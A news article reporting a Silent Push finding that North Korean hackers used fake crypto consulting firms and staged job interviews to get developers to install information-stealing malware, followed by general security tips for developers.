North Korean hackers are at it again—this time using fake companies and job interviews to trick unsuspecting crypto developers into installing malware.
According to a new report from cybersecurity firm Silent Push, a North Korean hacker subgroup has created three fake crypto consulting companies to spread malicious software. These sham companies—called BlockNovas, Angeloper Agency, and SoftGlide—are designed to look like real firms offering developer jobs. But in reality, they’re part of a clever scheme to steal valuable information from people in the crypto industry.
What’s the scam?
The hackers are using these fake companies to post job listings on hiring websites and freelance platforms. When a developer applies for a job, they’re invited to a fake interview process.
During the interview, they’re told to record an introduction video. But when they try to upload it, an “error message” pops up. The supposed fix? The site tells them to copy and paste a bit of code—a trick that actually installs malware on their computer.
Once the malware is in, it can steal things like crypto wallet keys, personal information, and even monitor what’s copied to the clipboard (like wallet addresses).
The Malware Involved
Silent Push identified three different malware tools being used in this scam:
- BeaverTail – used to steal information and bring in even more malware later.
- Otter Cookie – targets sensitive information, including wallet data.
- InvisibleFerret – focuses on stealing clipboard data and other important files.
This isn’t just a theoretical threat. According to the report, real developers have already been affected—one even had their MetaMask wallet compromised, which could mean a loss of crypto funds.
AI-Generated Employees?
To make the scam even more believable, the hackers used AI to create fake employee profiles on these companies’ websites. In some cases, they took real photos of actual people and used AI tools to modify the images just enough to avoid detection.
“There are a lot of fake employees and even stolen images from real people being used,” said Zach Edwards, a senior threat analyst at Silent Push.
FBI Steps In
The FBI has already taken action—they seized the domain for BlockNovas. However, SoftGlide is still live, meaning some parts of the scam are still operating. This shows how tricky it is to fully shut down these kinds of schemes once they’re in motion.
Why Hackers Target Crypto Developers?
Crypto developers are high-value targets. They often manage sensitive systems and may have access to private keys, wallet infrastructure, or other tools that handle large sums of crypto. By pretending to offer them a job, these hackers can bypass traditional security measures and hit them where they least expect it — through social engineering.
Not the first time
This isn’t an isolated event. Back in March, several crypto founders reported being approached by fake Zoom interviews, where hackers tried to get access to their devices. These scams are becoming more common, and Lazarus Group, a well-known North Korean hacking collective, is believed to be behind many of them.
They’ve been linked to some of the biggest hacks in Web3 history, including:
- The Bybit hack that stole $1.4 billion
- The Ronin Network exploit, which drained around $600 million
What should developers do?
If you’re a developer in crypto, be cautious when applying for jobs—especially from lesser-known firms. Here are a few tips:
- Double-check the company’s legitimacy. Look for company registration records, official websites, and real employee profiles on LinkedIn.
- Be wary of interview processes that involve downloading anything, copying code, or making unexpected changes to your device.
- Use antivirus and anti-malware tools, and keep them updated.
- Don’t share your screen or allow remote access unless you know exactly who you’re dealing with.
The bigger picture
This latest incident highlights how cyber threats are evolving. It’s not just about code anymore—hackers are blending tech and psychology to trick people. In this case, they’re not targeting users with phishing emails or fake websites. They’re posing as potential employers, using job platforms and realistic websites to gain trust.
It’s a reminder that in the crypto space, security goes beyond smart contracts and cold wallets. Social engineering is real, and even savvy developers can fall for it if they’re not paying close attention.
Next Steps for Developers and Teams
Law enforcement and cybersecurity experts are on the case. The FBI has already taken down one of the fake company websites, and firms like Silent Push are helping to expose how these scams operate.
But at the end of the day, staying safe starts with you. In a space as fast-moving and valuable as crypto, hackers will always be looking for creative ways to break in. For developers and professionals in the crypto space, this incident serves as a critical reminder: cybersecurity is no longer optional—it’s essential. From verifying hiring sources to avoiding unsolicited downloads, individuals must adopt proactive security practices.